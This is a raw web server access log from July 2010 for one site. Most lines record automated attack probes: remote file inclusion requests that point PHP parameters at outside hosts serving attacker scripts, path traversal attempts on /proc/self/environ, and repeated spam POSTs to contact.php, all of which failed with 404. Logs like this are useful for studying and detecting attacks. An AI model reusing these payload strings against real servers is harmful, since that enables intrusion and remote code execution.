211.169.249.251 - - [24/Jul/2010:09:20:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
211.169.249.251 - - [24/Jul/2010:09:20:09 -0700] "POST /logs/access_100717.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
211.169.249.251 - - [24/Jul/2010:09:20:09 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
41.78.28.104 - - [24/Jul/2010:09:21:27 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
41.78.28.104 - - [24/Jul/2010:09:22:15 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
93.127.227.249 - - [24/Jul/2010:09:23:17 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
93.127.227.249 - - [24/Jul/2010:09:23:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
93.127.227.249 - - [24/Jul/2010:09:23:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:09:28:15 -0700] "GET /logs/access.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:09:28:15 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:09:28:15 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
72.47.232.79 - - [24/Jul/2010:09:28:47 -0700] "GET /logs/modules/wiwimod/spaw/spaw_script.js.php?spaw_root=http://porthos.69blue.com/~bluemoon/heater_white.jpg?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
72.47.232.79 - - [24/Jul/2010:09:28:48 -0700] "GET /modules/wiwimod/spaw/spaw_script.js.php?spaw_root=http://porthos.69blue.com/~bluemoon/heater_white.jpg?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.getyourselfahorse.com"
207.46.195.228 - - [24/Jul/2010:09:30:29 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:33:06 -0700] "GET /logs/access_100424.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:33:06 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:33:06 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:09:33:13 -0700] "GET /logs/access_100501.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
212.174.28.46 - - [24/Jul/2010:09:33:32 -0700] "GET /logs/access_100515.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hanhaho.com/bbs/data/mutiupload/chelly??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:33:49 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:33:49 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:33:49 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
72.47.232.79 - - [24/Jul/2010:09:35:05 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://porthos.69blue.com/~bluemoon/heater_white.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.getyourselfahorse.com"
72.47.232.79 - - [24/Jul/2010:09:35:06 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://porthos.69blue.com/~bluemoon/heater_white.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:09:35:08 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://aoiu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:09:35:08 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aoiu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:35:53 -0700] "GET /logs/access_100424.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.195.111.183 - - [24/Jul/2010:09:35:58 -0700] "GET /?N=D HTTP/1.0" 200 899 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:37:27 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:37:27 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:37:27 -0700] "GET /logs/access_100619.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:37:55 -0700] "GET /logs/access_100306.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
65.60.10.2 - - [24/Jul/2010:09:39:11 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
65.60.10.2 - - [24/Jul/2010:09:39:11 -0700] "GET /logs/access_100424.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
65.60.10.2 - - [24/Jul/2010:09:39:11 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:39:15 -0700] "GET /logs/access_100417.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:39:15 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:39:15 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:39:19 -0700] "GET /logs/access_100417.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:39:19 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:39:19 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:39:57 -0700] "GET /logs/access_100529.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:40:05 -0700] "GET /logs/access_100529.log%20%20//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
65.60.10.2 - - [24/Jul/2010:09:40:09 -0700] "GET /logs/access_100410.log%20%20//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
207.46.195.228 - - [24/Jul/2010:09:40:14 -0700] "GET /logs/ HTTP/1.1" 200 3941 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:40:28 -0700] "GET /logs/access_100313.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:40:28 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:40:28 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.52.80 - - [24/Jul/2010:09:41:40 -0700] "GET /toolbar.php?dirDepth=http://aoiu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
222.122.52.80 - - [24/Jul/2010:09:41:40 -0700] "GET /logs//toolbar.php?dirDepth=http://aoiu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:52 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:52 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:52 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:53 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:53 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:53 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
77.221.39.243 - - [24/Jul/2010:09:41:53 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:41:57 -0700] "GET /logs/access_100417.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:43:16 -0700] "GET /logs/access_100626.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.122.52.80 - - [24/Jul/2010:09:43:48 -0700] "GET /logs/access_100424.log/toolbar.php?dirDepth=http://aoiu.interfree.it/id.jpg?? HTTP/1.0" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:45:40 -0700] "GET /logs/access_100417.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.147.240 - - [24/Jul/2010:09:45:49 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
110.45.147.240 - - [24/Jul/2010:09:45:49 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
110.45.147.240 - - [24/Jul/2010:09:45:49 -0700] "GET /logs/access.log//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:07 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:08 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:46:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:09 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:09 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:10 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:46:10 -0700] "POST /logs/access.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
93.125.99.2 - - [24/Jul/2010:09:46:11 -0700] "GET /logs/access_100417.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://razi.teo.ir/images/maghale/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:46:45 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:46:45 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:09:47:01 -0700] "GET /logs/access_100417.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:47:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:47:33 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:47:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:47:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:09:47:35 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:09:47:35 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:09:47:36 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "getyourselfahorse.com"
74.55.73.74 - - [24/Jul/2010:09:47:36 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "getyourselfahorse.com"
87.252.2.168 - - [24/Jul/2010:09:47:53 -0700] "GET /logs/access_100522.log/modules/vwar/admin/admin.php?vwar_root=http://aoiu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:47:56 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:47:57 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:47:57 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:09:47:58 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
67.195.111.183 - - [24/Jul/2010:09:48:03 -0700] "GET /logs/?N=A HTTP/1.0" 200 3925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.getyourselfahorse.com"
65.60.10.2 - - [24/Jul/2010:09:48:41 -0700] "GET /logs/access_100424.log//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
65.60.10.2 - - [24/Jul/2010:09:50:00 -0700] "GET /logs/access_100410.log//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.147.240 - - [24/Jul/2010:09:50:59 -0700] "GET /components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.147.240 - - [24/Jul/2010:09:50:59 -0700] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.147.240 - - [24/Jul/2010:09:51:00 -0700] "GET /logs/access_100424.log//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
110.45.147.240 - - [24/Jul/2010:09:51:36 -0700] "GET /logs/access_100410.log//components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.3.179.234 - - [24/Jul/2010:09:53:11 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.3.179.234 - - [24/Jul/2010:09:53:11 -0700] "GET /logs/access_100227.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.3.179.234 - - [24/Jul/2010:09:53:11 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.155.9.169 - - [24/Jul/2010:09:53:56 -0700] "GET /logs/access_100424.logadministrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://aoiu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
122.155.9.169 - - [24/Jul/2010:09:53:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://aoiu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
122.155.9.169 - - [24/Jul/2010:09:54:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://aoiu.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.3.179.234 - - [24/Jul/2010:09:54:00 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.3.179.234 - - [24/Jul/2010:09:54:00 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.3.179.234 - - [24/Jul/2010:09:54:00 -0700] "GET /logs/access_100227.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
62.149.233.199 - - [24/Jul/2010:09:54:33 -0700] "GET /logs/access.log/index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.149.233.199 - - [24/Jul/2010:09:54:33 -0700] "GET /index.php?option=com_diary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:56:19 -0700] "GET /logs/access_100717.log/index.php?option=com_hsconfig&controller=http://crespon01.fileave.com/crespon/Ckrid1.txt.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:56:20 -0700] "GET /logs/index.php?option=com_hsconfig&controller=http://crespon01.fileave.com/crespon/Ckrid1.txt.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:56:20 -0700] "GET /index.php?option=com_hsconfig&controller=http://crespon01.fileave.com/crespon/Ckrid1.txt.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.getyourselfahorse.com"
194.19.251.181 - - [24/Jul/2010:09:56:22 -0700] "GET /logs/access_100710.log/index.php?option=com_hsconfig&controller=http://crespon01.fileave.com/crespon/Ckrid1.txt.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.getyourselfahorse.com" 211.169.249